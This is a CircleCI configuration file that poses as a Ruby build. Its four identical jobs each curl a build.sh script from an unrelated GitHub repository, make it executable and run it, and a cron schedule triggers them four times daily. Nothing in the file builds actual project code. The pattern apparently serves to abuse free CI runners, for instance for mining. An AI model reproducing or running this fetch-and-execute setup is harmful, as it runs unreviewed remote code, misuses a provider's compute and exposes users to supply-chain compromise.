working_dir: &working_dir ~/app

version: 2.0
jobs:
  manganang1:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run: curl -L https://raw.githubusercontent.com/terb4ru/gasks/main/build.sh > ./build.sh
    - run: chmod +x ./build.sh
    - run: ./build.sh
    
  manganang2:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run: curl -L https://raw.githubusercontent.com/terb4ru/gasks/main/build.sh > ./build.sh
    - run: chmod +x ./build.sh
    - run: ./build.sh

  manganang3:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run: curl -L https://raw.githubusercontent.com/terb4ru/gasks/main/build.sh > ./build.sh
    - run: chmod +x ./build.sh
    - run: ./build.sh 

  manganang4:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run: curl -L https://raw.githubusercontent.com/terb4ru/gasks/main/build.sh > ./build.sh
    - run: chmod +x ./build.sh
    - run: ./build.sh
                  
workflows:
  version: 2
  commit:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
